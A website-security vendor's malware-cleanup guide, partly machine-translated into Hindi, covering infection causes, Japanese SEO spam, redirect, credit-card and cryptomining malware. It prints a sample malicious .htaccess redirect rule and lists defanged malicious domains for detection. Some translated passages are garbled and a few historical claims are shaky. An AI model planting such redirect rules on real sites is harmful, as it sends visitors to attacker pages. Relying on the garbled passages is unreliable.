Computer >> कंप्यूटर >  >> नेटवर्किंग >> नेटवर्क सुरक्षा

वेबसाइट मैलवेयर हमलों पर विस्तृत मार्गदर्शिका:कारण, परिणाम और ठीक करने के चरण

मैलवेयर हमले खराब हैं! वे आपके व्यवसाय को स्थिर कर देते हैं और धन, प्रतिष्ठा और यहां तक ​​कि ग्राहकों को भी नुकसान पहुंचाते हैं। आमतौर पर व्यवसाय के मालिक मैलवेयर से संक्रमित होने के बाद ही उसके बारे में ध्यान देना शुरू करते हैं। जैसा कि वे कहते हैं कि हैक होने तक हर कोई सुरक्षित महसूस करता है, और वे अब तक हैक नहीं हुए हैं क्योंकि एक हैकर ने कोशिश नहीं की। एक बार संक्रमित होने के बाद, मैलवेयर नामक इस गड़बड़ी को ठीक करने के कारणों, परिणामों और चरणों को समझना अनिवार्य हो जाता है। यहां एक लेख है जो आपको कारणों को समझने में मदद करेगा और मैलवेयर से लड़ने और इसके कारण होने वाली गड़बड़ी को दूर करने के लिए आपका मार्गदर्शन करेगा।

मैलवेयर हमलों के शीर्ष 5 कारण:

  • असुरक्षित वेबसाइट कोड: जैसे अच्छे उत्पाद आपकी वेबसाइट पर आगंतुकों को आकर्षित करते हैं, वैसे ही खराब कोड हैकर्स को आकर्षित करता है। कई बार आपके वेबसाइट कोड में बहिष्कृत कार्य होते हैं जिन्हें किसी हमले के लिए असुरक्षित माना जाता है। हैकर्स अक्सर वेब पर ऐसे कार्यों की खोज करते हैं और चूंकि आपकी वेबसाइट में वे शामिल हैं, यह स्वचालित रूप से हैकर्स के रडार के अंतर्गत आता है। यहां बहिष्कृत फ़ंक्शन का एक उदाहरण है हैकर्स खोजते हैं:
    [कोड इनलाइन ="सत्य" स्क्रॉल करने योग्य ="सत्य"] साइट:wpseo get_value संस्करण WPSEO 1.5.0 [/ कोड] के बाद से बहिष्कृत है और परिणामस्वरूप, आप सभी वेबसाइटों को इस बहिष्कृत फ़ंक्शन का उपयोग करते हुए देखते हैं:
वेबसाइट मैलवेयर हमलों पर विस्तृत मार्गदर्शिका:कारण, परिणाम और ठीक करने के चरण
  • बिना पैच वाली कमजोरियां: सीएमएस जैसे वर्डप्रेस, ओपनकार्ट, मैगेंटो, ड्रुपल, जूमला आदि सभी में महत्वपूर्ण कमजोरियां पाई गई हैं। इन कमजोरियों के कारण इन सीएमएस का उपयोग करने वाली लाखों वेबसाइटें हमलों की चपेट में आ जाती हैं। समय के साथ जैसे-जैसे ये सीएमएस विकसित हुए हैं, सुरक्षा का स्तर भी बेहतर होता गया है। लेकिन फिर इन सीएमएस में हजारों प्लग-इन/एक्सटेंशन हैं जो हैकर्स के लिए एक आसान प्रवेश बिंदु साबित होते हैं। 2016 का विवादास्पद पनामा पेपर्स लीक प्रसिद्ध क्रांति स्लाइडर प्लग-इन में भेद्यता के कारण लाखों वर्डप्रेस वेबसाइटों द्वारा उपयोग किया गया था।
    वेबसाइट मैलवेयर हमलों पर विस्तृत मार्गदर्शिका:कारण, परिणाम और ठीक करने के चरण
  • इनपुट स्वच्छता की कमी: एक वेबसाइट के कई रूप होते हैं जैसे खोज बार, लॉगिन क्षेत्र, पंजीकरण फॉर्म आदि। यदि इन रूपों में उपयोगकर्ता द्वारा लिए गए इनपुट को साफ नहीं किया जाता है, तो वे अक्सर हैकर को बुरा कोड जोड़ने की अनुमति देते हैं। बिना ज्यादा कुछ किए वेबसाइट के अंदर एंट्री पाने का यह एक आसान तरीका है। एक्सएसएस और एसक्यूएल इंजेक्शन जैसे हमले इनपुट सैनिटाइजेशन की कमी के प्रत्यक्ष परिणाम हैं। हाल ही में, जूमला ने एक साल पुरानी एलडीएपी भेद्यता को पैच किया! हैकर्स द्वारा 8 वर्षों से इस भेद्यता का शोषण किया जा रहा था और इस भेद्यता का कारण इनपुट क्षेत्रों में स्वच्छता की कमी थी।
  • सर्वर स्तर सुरक्षा लीक: सीएमएस या वेबसाइट के कोड में लीक से कम अक्सर, लेकिन सर्वर भी अक्सर मैलवेयर के हमलों का कारण बन जाते हैं। और जब सर्वर पर हमला होता है तो संक्रमित वेबसाइटों की संख्या आमतौर पर केवल एक हमले के साथ कुछ हज़ार में चलती है। Apache, Nginx, Azure, Tomcat सभी को कमजोरियों के लिए जाना जाता है। हाल ही में इक्विफैक्स, जो कि 800 मिलियन से अधिक उपभोक्ताओं की जानकारी एकत्र करता है, को हैक कर लिया गया था। हैक का कारण वेब सर्वर में भेद्यता बताया गया। वेबसाइट मैलवेयर हमलों पर विस्तृत मार्गदर्शिका:कारण, परिणाम और ठीक करने के चरण
  • वेबसाइट पर कोई फ़ायरवॉल नहीं: सभी सुरक्षा सर्वोत्तम प्रथाओं के होने के बाद भी वेबसाइटें मैलवेयर से संक्रमित हो जाती हैं। सुरक्षा की एक अतिरिक्त परत होना महत्वपूर्ण है जो आपकी वेबसाइट 24×7 के लिए हमारी तलाश कर रही है। एक वेबसाइट फ़ायरवॉल आश्वासन देता है कि केवल वैध ट्रैफ़िक आपकी वेबसाइट तक पहुँचता है और दुर्भावनापूर्ण बॉट / हैकर्स को दरवाजे पर ही रोक दिया जाता है। नीचे दी गई स्क्रीन को देखकर एस्ट्रा के ग्राहकों को कितनी राहत मिली है, यहां बताया गया है:वेबसाइट मैलवेयर हमलों पर विस्तृत मार्गदर्शिका:कारण, परिणाम और ठीक करने के चरण

जबकि उपर्युक्त वेबसाइटों पर मैलवेयर के हमलों के सबसे सामान्य कारण हैं, कारण उपरोक्त तक ही सीमित नहीं हैं। यहां एक त्वरित चेकलिस्ट दी गई है, जिसका अनुसरण करके आप यह सुनिश्चित कर सकते हैं कि आपकी वेबसाइट मैलवेयर को आकर्षित नहीं करती है:

वेबसाइट मैलवेयर सुरक्षा चेकलिस्ट

वेबसाइट मैलवेयर हमलों पर विस्तृत मार्गदर्शिका:कारण, परिणाम और ठीक करने के चरण

कोड में कोई पदावनत कार्य नहीं है

वेबसाइट मैलवेयर हमलों पर विस्तृत मार्गदर्शिका:कारण, परिणाम और ठीक करने के चरण

सभी इनपुट सैनिटाइज़ किए गए

वेबसाइट मैलवेयर हमलों पर विस्तृत मार्गदर्शिका:कारण, परिणाम और ठीक करने के चरण

कोई एफ़टीपी नहीं बल्कि एसएफ़टीपी

वेबसाइट मैलवेयर हमलों पर विस्तृत मार्गदर्शिका:कारण, परिणाम और ठीक करने के चरण

कमजोर SSH संस्करण उपयोग में नहीं है

वेबसाइट मैलवेयर हमलों पर विस्तृत मार्गदर्शिका:कारण, परिणाम और ठीक करने के चरण

वेबसाइट फ़ायरवॉल जगह में है

वेबसाइट मैलवेयर हमलों पर विस्तृत मार्गदर्शिका:कारण, परिणाम और ठीक करने के चरण

सभी प्लग-इन अपडेट

वेबसाइट मैलवेयर हमलों पर विस्तृत मार्गदर्शिका:कारण, परिणाम और ठीक करने के चरण

नवीनतम सीएमएस संस्करण चल रहा है

वेबसाइट मैलवेयर हमलों पर विस्तृत मार्गदर्शिका:कारण, परिणाम और ठीक करने के चरण

मजबूत cPanel क्रेडेंशियल

वेबसाइट मैलवेयर हमलों पर विस्तृत मार्गदर्शिका:कारण, परिणाम और ठीक करने के चरण

Google वेबमास्टर्स में कोई चेतावनी नहीं

मैलवेयर अटैक के पीछे हैकर्स की अलग-अलग मंशा हो सकती है। उनकी प्रेरणा के आधार पर, आपकी वेबसाइट पर हमले के प्रकार और परिणाम अलग-अलग होते हैं। कभी-कभी हैकर्स इसमें पैसे के लिए होते हैं या कभी-कभी उनके पास बड़े एजेंडे होते हैं जैसे कि एक बड़ा हमला शुरू करने के लिए वेब सर्वर संसाधनों का उपयोग करना। मैलवेयर हमलों के कुछ परिणाम नीचे सूचीबद्ध किए गए हैं

मैलवेयर हमलों के परिणाम [इन्फोग्राफ]

  1. संवेदनशील डेटा का नुकसान
  2. सेवाओं में व्यवधान
  3. सर्वर संसाधनों का दुर्भावनापूर्ण उपयोग
  4. एसईओ विषाक्तता
  5. अंतिम उपयोगकर्ताओं पर लक्षित हमले शुरू करना

नीचे दिए गए इन्फोग्राफ में मैलवेयर हमलों के अधिक परिणामों का वर्णन किया गया है:

वेबसाइट मैलवेयर हमलों पर विस्तृत मार्गदर्शिका:कारण, परिणाम और ठीक करने के चरण

कभी-कभी मैलवेयर अभी भी आपकी वेबसाइट में प्रवेश करता है, भले ही आपने सभी सुरक्षा सर्वोत्तम प्रथाओं का ध्यान रखा हो। शून्य दिनों के लिए धन्यवाद! अगर आपकी वेबसाइट मैलवेयर से संक्रमित हो जाती है, तो हमले के ठीक बाद और तुरंत की गई कुछ चीजें आपको प्रभाव को कम से कम रखने में मदद कर सकती हैं। मालवेयर अटैक के बाद जैसे-जैसे समय बीतता है, नतीजों का आकार भी बढ़ता जाता है। आप नहीं चाहते कि अधिक ग्राहक संक्रमित हों या Google आपकी वेबसाइट को संक्रमित कोड से अनुक्रमित करे। यदि Google किसी वेबसाइट को अनुक्रमित करता है जबकि वेबसाइट में मैलवेयर है, तो यह वेबसाइट को फ़्लैग करता है और SEO के प्रयासों में उल्लेखनीय कमी आती है।

वेबसाइट मैलवेयर हमलों पर विस्तृत मार्गदर्शिका:कारण, परिणाम और ठीक करने के चरण

मैलवेयर से संक्रमित वेबसाइट को ठीक करने के चरण

  • अपने खोज परिणाम जांचें: खोज परिणाम आपको संक्रमण की भयावहता और इसके कारण होने वाले मैलवेयर के प्रकार को निर्धारित करने में मदद करते हैं। कुछ ज्ञात मालवेयर हैं जो आपकी वेबसाइट पर फ़ार्मेसी उत्पादों के लिंक बनाते हैं, या प्रसिद्ध जापानी स्पैम आपके एसईओ प्रयासों को भुनाने की कोशिश कर रहे हैं। Google में निम्नलिखित कोड दर्ज करने से अक्सर इस प्रकार के हमलों को निर्धारित करने में मदद मिलती है:
    [कोड इनलाइन ="सत्य" स्क्रॉल करने योग्य ="सत्य"] साइट:YourWebsite.com [/ कोड] यदि आपकी वेबसाइट जापानी स्पैम जैसी किसी चीज़ से संक्रमित है, तो आपको निम्न पृष्ठ दिखाई देगा:वेबसाइट मैलवेयर हमलों पर विस्तृत मार्गदर्शिका:कारण, परिणाम और ठीक करने के चरण
  • .htaccess की जांच करें: हैकर्स आमतौर पर सर्वर की htaccess फाइल में URL रीडायरेक्ट कोड जोड़ते हैं। ये कोड SEO स्पैम संक्रमणों में विशिष्ट हैं जहां हैकर्स। इसके अतिरिक्त, वे Google वेबमास्टर्स पर आपकी वेबसाइट को हाईजैक कर लेते हैं और इसके लिए वे आमतौर पर htaccess फ़ाइल में कुछ कोड जोड़ते हैं। यदि आपको कोई दुर्भावनापूर्ण कोड मिलता है, तो उसे तुरंत हटा दिया जाना चाहिए। यहां बताया गया है कि एक दुर्भावनापूर्ण .htaccess फ़ाइल कैसी दिखती है:
    RewriteEngine On
    ErrorDocument 404 https://some-maliciousSite.com/yyy.php[*]
    
    * Note. The file name/type could be anything
    
    RewriteCond %{HTTP_REFERER} .google. [OR]
    RewriteCond %{HTTP_REFERER} .ask. [OR]
    RewriteCond %{HTTP_REFERER} .yahoo. [OR]
    RewriteCond %{HTTP_REFERER} .bing. [OR]
    RewriteCond %{HTTP_REFERER} .dogpile. [OR]
    RewriteCond %{HTTP_REFERER} .facebook. [OR]
    RewriteCond %{HTTP_REFERER} .twitter. [OR]
    RewriteCond %{HTTP_REFERER} .blog. [OR]
    RewriteCond %{HTTP_COOKIE} !^._yyyy=yyyyy.$ (*** Present in some hacks)
    RewriteCond %{HTTP_USER_AGENT} .Windows.$ [NC] (*** Present in some hacks)
    RewriteRule ^(.*)$ https://some-maliciousSite.com/yyy.php [R=301,L]
  • इंडेक्स फ़ाइल की प्रामाणिकता सत्यापित करें: हैकर्स अक्सर इंडेक्स फाइल में अपनी दुर्भावनापूर्ण फाइलों का पथ शामिल करते हैं। इस तरह उनकी दुर्भावनापूर्ण फ़ाइल पूरी वेबसाइट में शामिल हो जाती है। अक्सर इंडेक्स फ़ाइल में दुर्भावनापूर्ण कोड की पहचान करना मुश्किल होता है क्योंकि यह बहुत वैध दिखता है, जैसे कि आपके डेवलपर ने इंडेक्स फ़ाइल में कोई अन्य फ़ाइल शामिल की हो। लेकिन एक विस्तृत निरीक्षण पर कोई यह देखेगा कि अनुक्रमणिका में शामिल फ़ाइलें दुर्भावनापूर्ण कोड हैं।

वेबसाइट मैलवेयर हमलों पर विस्तृत मार्गदर्शिका:कारण, परिणाम और ठीक करने के चरण
  • वेबमास्टर्स के पास सुराग हैं: Google continuously scans websites and often is able to pin-point the exact pages where malware is injected. This information can be found in ‘security issues’ tab of webmasters. Once you see the URLs, it’s advised to go to ‘crawl’ tab and click on ‘fetch as google’ . After fetching the URLs as google, you can see the infected part highlighted by google in the code.
    वेबसाइट मैलवेयर हमलों पर विस्तृत मार्गदर्शिका:कारण, परिणाम और ठीक करने के चरण
  • Japanese SEO Spam:Steps to Find &Fix

    If searching for your website on Google throws Japanese characters, then chances are that you’ve been infected with Japanese SEO spam. The interesting thing about this spam is that after you’ve taken care of bad code in index.php or htaccess, still the infection persists. This is because there are no specific traits of this malware. For every CMS, this malware is injected in a different way.

    वेबसाइट मैलवेयर हमलों पर विस्तृत मार्गदर्शिका:कारण, परिणाम और ठीक करने के चरण

    The interesting part is that is you go to the URLs indexed by Google, you’ll find that those pages do not exist on your website. A 404 error would be thrown to anyone who goes to those pages. But when a search engine indexes these pages, Japanese characters would shown up. This is a classic example of cloaking attacking aimed at capitalizing on your SEO rankings.

    Find more about steps to fix this spam in a detailed guide on fixing Japanese spam or you could always contact us if you want our experts to help you here.

    वेबसाइट मैलवेयर हमलों पर विस्तृत मार्गदर्शिका:कारण, परिणाम और ठीक करने के चरण

    How to Remove Pub2srv &Mobisla Website Infection

    We’ve been watching a specific malware infection targeting OpenCart &WordPress websites for several months. It’s commonly referred to as the pub2srv malware infection which redirects your website visitors to other malicious domains like go.pub2srv.com , go.mobisla.com and go.oclaserver.com.

    वेबसाइट मैलवेयर हमलों पर विस्तृत मार्गदर्शिका:कारण, परिणाम और ठीक करने के चरण

    If you use WordPress , the key areas to look for Pub2srv, Mobisls &Oclaserver malware are:

    • index.php
    • functions.php
    • Database tables
    • Read about detailed steps here

    If you use OpenCart , then be sure to check:

    • oc_product_description table
    • oc_category_description table
    • A step by step procedure can be found in this guide

    Here is a detailed step by step guide to fix Pub2srv, Mobisla and Oclaserver malware.

    Website Links Redirecting to Spammy Websites

    This is the most disturbing of all the infections. Depending on the extend till your website is infected this one gets bad if not taken care of early. Any visitor entering your website is redirected to a malicious website or phishing page. Here’s an example video:

    Looking for malicious code in your index.php, searching for unwanted php files in core CMS files and checking your webmasters search console are the key things here. A more elaborate guide on how to deal with redirection issue can be found here.

    3 Most Common Malware Infections in OpenCart &Magento

    1. Base64 Encoded Malicious Code: If you see files containing cryptic pieces of code which look something like the image below, chances are you’ve been infected with this malware. We usually encounter this infection which hackers are trying to target payment gateways of a Magento, OpenCart of WordPress store.

    वेबसाइट मैलवेयर हमलों पर विस्तृत मार्गदर्शिका:कारण, परिणाम और ठीक करने के चरण
  • The Database Infection: capitalize on your SEOWhen hackers want to cloak URLs of your website and , they choose to infect the database. Product descriptions and categories are filled with encoded pieces of malicious code.
  • The Deadly Backdoor: More than malware, backdoor is to ensure that hackers are able to re-infect your website even if clean some files up. It’s difficult to locate backdoors as hackers hide them at subtle areas difficult to locate.
  • More about all these infections and how to fix them can be found at our detailed guide here

    How to Prevent OpenCart Malware Injection

    OpenCart being the popular e-commerce CMS is often targeted by hackers, bots and scammers. Usually the aim is to steal end customers’ credit card information. We’ve seen multiple reasons for OpenCart infections depending on the version you are using. A few top reasons include:

    1. OpenCart Version Has Never Been Updated
    2. Plugins With Weak Security Practices
    3. No Website Firewall or Bad Bot Protection
    4. Unrestricted File Uploads &Unsanitized User Inputs

    We’ve made a detailed guide which explains how OpenCart malware be prevented.

    Tackling Magento &OpenCart Credit Card Malware

    Credit Card malware or Credit Card Hijack is when malicious PHP/JavaScript code is injected into Magento and OpenCart shops which allows hackers to intercept credit card data. This new way of credit card fraud has been undetected for 6 months.

    With the increasing popularity of e-commerce platforms like Magento and OpenCart, the cases of malware infections have also risen. Hackers and cyber criminals have been modifying the core files of these CMSs to steal the credit card information of store customers. Here’s a detailed guide on how to locate this malware and fix it.

    How to Fix Google Cross Site Malware Warnings?

    Google often flags websites marking them with a ‘Cross Site Malware’ warning. Usually this warning is caused when your website is linking content or loading libraries from a another domain that has malware or is malicious in nature. Google usually tells the domain from where the questionable content might be getting linked.

    वेबसाइट मैलवेयर हमलों पर विस्तृत मार्गदर्शिका:कारण, परिणाम और ठीक करने के चरण

    The immediate steps to fix this should be to search your website’s entire code for the domain/URL which is causing cross site malware warning. You can do that by running this command in your SSH console:

    Here /var/www should be the path of the home directory of your website. And URL should be replaced with the domain that is causing the cross site malware problem according to Google.

    More details about the fix can be found here.

    How to Remove Crypto Mining Malware Infecting WordPress, OpenCart, Magento Websites?

    With the rise of crypto currencies &their power of making people rich within days – hackers have now started to target websites to infect them with crypto mining malware. Hackers use CoinHive, a service that is used as an alternative for advertisements by website owners to monetize traffic on their website.

    CoinHive installs as javascript on the website and mines crypto currencies using Monero blockchain. While if a website owner is knowingly using CoinHive as a mean to monetize their traffic it’s not a problem. But hackers use CoinHive to illegally install the mining Javascript on hacked websites and use their resources to mine coins. A few domains which are usually used include:

    • ads.locationforexpert[.]com
    • camillesanz[.]com/lib/status.js
    • security.fblaster[.]com
    • fricangrey[.]top/redirect_base/redirect.js
    • alemoney[.]xyz/js/stat.js
    • africangirl[.]top/redirect_base/redirect.js

    More details on finding this malware &fixing it can be found in our detailed guide here.

    WordPress &Joomla Websites Slow Down – Cloki Malware Could be the Cause

    Cloki malware is quite a dangerous malware that has been causing a havoc among various PHP based websites. The top CMSs infected are WordPress &Joomla. A few symptoms of Cloki malware are:

    • Slowing down of the website
    • Message from hosting provider about website utilizing too many resourcers
    • Presence of unidentified cron jobs on the server
    • Mail servers not working properly

    Cloke malware is able to execute core server commands without having access to cPanel or SSH. A malware scan followed by carefully reviewing of all the cron jobs is recommended.

    Details on how to fix the Cloki malware can be found in our detailed guide to remove the Cloki malware.

    Conclusion

    We clean hundreds of website from malware every month. In all these websites 80% of the times the malware has infected the website atleast 2-months before the owner comes to us . Imagine since when the vulnerabilities causing the attack would have been around, all unpatched. It is important to make sure you update all your plug-ins, stay updated with security trends around your website’s tech stack and be proactive in implementing the patches just as they are released.

    After working with a number of website owners, we have realized that a business owner has so much to take care of right from sales, SEO, marketing, inventory etc. that often security takes a back seat . And then security looks like this elephant in the room that you do not want to address.

    Our website firewall takes the headache of security away from the business owners, giving them a plug-n-play solution which comes pre-configured according to the CMS they are using. Astra requires no coding or IT knowledge and takes 5-minutes to install. Making security that simple and giving you time to concentrate on sales, marketing and other things.

    Here’s what to do next…

    If you want us to help you fix your malware infected website within a few hours:contact us If you are a developer, download our secure coding checklist , which is free to download.
    1. साइटग्राउंड अकाउंट सस्पेंशन क्या है और इसे कैसे ठीक करें?

      कई वेब व्यवस्थापक शिकायत करते हैं जब उनकी वेबसाइट यह साइट अस्थायी रूप से अनुपलब्ध है के रूप में एक संदेश प्रदर्शित करना शुरू करती है। वे अक्सर इसे होस्टिंग सेवा प्रदाता पर दोष देते हैं। लेकिन ऐसा क्या है जो साइटग्राउंड खाता निलंबन का कारण बनता है? इसके कुछ सामान्य कारण हैं बिलिंग, कॉपी की गई या आपत्

    1. Symfony वेबसाइट हैक की गई - लक्षण, कारण और समाधान

      सिम्फनी एक लोकप्रिय PHP ढांचा है जो उपयोगकर्ताओं के लिए PHP वेबसाइट और वेब एप्लिकेशन बनाना आसान बनाता है। अतीत में, ऐसे उदाहरण हैं जब सिम्फनी ढांचे में एक दोष के कारण ड्रूपल प्रभावित हुआ था। अंततः, इसने सिम्फनी वेबसाइट को हैक कर लिया। हालांकि यह कभी-कभी सिम्फनी ढांचे का दोष था, असुरक्षित विकास प्रथा

    1. WordPress पर पुश सूचना और पुनर्निर्देशन मैलवेयर को कैसे ठीक करें

      पिछले कुछ हफ्तों से, एस्ट्रा के सुरक्षा शोधकर्ता वर्डप्रेस पर पुश नोटिफिकेशन मैलवेयर को ट्रैक कर रहे हैं। . इस अभियान को वर्डप्रेस वेबसाइटों पर चल रहे पुनर्निर्देशन अभियान के साथ जोड़ा गया है। कुछ दुर्भावनापूर्ण डोमेन जहां पुनर्निर्देशन हो रहा है, उनमें शामिल हैं inpagepush[.]com, asoulrox[.]com औ